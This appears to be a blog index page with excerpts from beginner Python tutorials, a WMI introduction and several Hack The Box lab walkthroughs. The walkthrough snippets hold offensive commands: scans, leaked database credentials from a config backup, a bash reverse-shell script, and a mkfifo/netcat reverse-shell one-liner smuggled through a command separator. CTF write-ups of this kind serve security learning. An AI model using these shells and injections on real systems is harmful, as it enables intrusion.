Lazy programming Series – Comments, Escape Sequence and Print statement | Simple Calculator
In Python, comments, escape sequences, and the print statement are important elements for writing clear and functional code. Comments: Comments...
Lazy programming Series – Module and Simple Program
Modules: In Python, a module is a file containing Python definitions and statements. The file name is the module name...
Lazy programming Series – Introduction of Python
Python is a high-level, versatile, and interpreted programming language that is widely used for various purposes, including web development, data...
Hack The Box – Spectra
──(root💀kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/ ┌──(root💀kali)-[/home/kali/Downloads] └─# wget http://spectra.htb/testing/wp-config.php.save ‘DB_USER’, ‘devtest’ ‘DB_PASSWORD’, ‘devteam01’ python3 -c...
Hack The Box – Breadcrumbs
http://10.10.10.228/ ┌──(root💀kali)-[/home/kali/Downloads/ffuf] └─# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php https://10.10.10.228/php/ https://10.10.10.228/db/ https://10.10.10.228/books/ https://10.10.10.228/portal/login.php Here click on helper https://10.10.10.228/portal/php/admins.php https://10.10.10.228/portal/login.php...
Hack The Box – Ophiuchi
http://10.10.10.227:8080/ ┌──(root💀kali)-[/home/kali/Downloads] └─# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts ┌──(root💀kali)-[/home/kali/Downloads] └─# git clone https://github.com/artsploit/yaml-payload ┌──(root💀kali)-[/home/kali/Downloads/yaml-payload] └─# cat rev.sh #!/bin/sh bash -i...
Hack The Box – Scriptkiddie
http://10.10.10.226:5000/ exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ User.txt: ebca83b5823fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX echo “1 2 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.46 1234...
Hack The Box – Tentacle
┌──(root💀kali)-[/home/kali/Downloads] └─# nmap -sV -v -p- –min-rate=10000 10.10.10.224 http://10.10.10.224:3128/ By above we get j.nakazawa@realcorp.htbsrv01.realcorp.htb (squid/4.11) ┌──(root💀kali)-[/home/…/Downloads/SecLists/Discovery/DNS] └─# dnsenum –threads 64...
Hack The Box -Armageddon
┌──(root💀kali)-[/home/kali/Downloads] └─# nmap 10.10.10.233 http://10.10.10.233/ Let’s check if we can work a way around the login page! Exploring, I found...
WMI – Red & Blue Team : What is WMI?
WMI stands for Windows Management Instrumentation, and it is a set of specifications from Microsoft that defines a standard interface...